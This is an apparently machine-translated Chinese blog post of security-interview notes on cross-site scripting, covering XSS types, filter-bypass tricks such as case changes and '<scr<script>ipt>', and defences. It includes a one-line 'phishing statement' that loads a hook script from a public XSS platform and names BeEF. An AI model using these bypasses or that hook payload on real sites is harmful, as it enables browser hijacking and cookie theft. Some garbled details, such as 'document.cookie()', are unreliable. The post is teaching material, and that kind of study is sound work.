当前位置:网站首页>XSS (cross site scripting attack) for security interview
XSS (cross site scripting attack) for security interview
2022-07-06 14:16:00 【Unknown white hat】
1、XSS principle : Developers did not do a good job of filtering , As a result, we can close the tag and insert and execute malicious JS Code
2、xss Type classification
DOM type : from DOM The document is parsed
reflective : Plug and play , Not stored in the database
Storage type : Stored in the database , Cause persistent attacks
3、 frequently-used JS function
document.cookie(): Pop up the browser of the current web address cookie
console.log('xss'): Log output at the console
4、 Way around
4.1. Change case :<SCript>
4.2. Code bypass (html Entity encoding 、 Decimal hexadecimal octal encoding 、unicode code )、
4.3. Turn off the tag : Use the greater than sign > Closing the tag makes xss take effect
4.4. Double write and forgive :<scr<script>ipt>
4.5. You can use spaces . Line break ,tab Key or /**/,/*!a*/, Bypass keyword detection in the form of
4.6. use / Instead of spaces
4.7. Use inverted quotation marks instead of parentheses 、 Double quotes
4.8. use throw Replace brackets
4.9. use html Entity encoding : Instead of a colon
4.10. use jsfuck Encoding bypasses most character filtering
5、 Scan tool
xsstrick
6、XSS Fishing platform
kali Tools :BEEF
Free platform :https://xss.pt/
Phishing statement :<img src=https://xss.pt/hook.js>
7、xss defense
7.1、 Filter sensitive characters , for example :aler()、<script>、onerror
7.2、 increase httponly: Front end execution is prohibited JS Code
边栏推荐
- [VMware abnormal problems] problem analysis & Solutions
- Record an edu, SQL injection practice
- Xray and Burp linked Mining
- 中间件漏洞复现—apache
- An unhandled exception occurred when C connected to SQL Server: system Argumentexception: "keyword not supported:" integrated
- 7-14 error ticket (PTA program design)
- AQS details
- Hackmyvm target series (2) -warrior
- HackMyvm靶機系列(3)-visions
- xray与burp联动 挖掘
猜你喜欢
Hackmyvm Target Series (3) - vues
循环队列(C语言)
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
xray与burp联动 挖掘
Experiment 6 inheritance and polymorphism
Web vulnerability - File Inclusion Vulnerability of file operation
Build domain environment (win)
Record once, modify password logic vulnerability actual combat
HackMyvm靶机系列(1)-webmaster
记一次,修改密码逻辑漏洞实战
随机推荐
HackMyvm靶机系列(7)-Tron
《英特尔 oneAPI—打开异构新纪元》
实验五 类和对象
网络基础详解
JDBC事务、批处理以及连接池(超详细)
强化学习基础记录
记一次,修改密码逻辑漏洞实战
Data mining - a discussion on sample imbalance in classification problems
【educoder数据库实验 索引】
7-4 散列表查找(PTA程序设计)
Matlab opens M file garbled solution
Canvas foundation 2 - arc - draw arc
Experiment 7 use of common classes
What language should I learn from zero foundation. Suggestions
Ucos-iii learning records (11) - task management
HackMyvm靶机系列(4)-vulny
网络层—简单的arp断网
实验八 异常处理
Detailed explanation of network foundation
7-14 错误票据(PTA程序设计)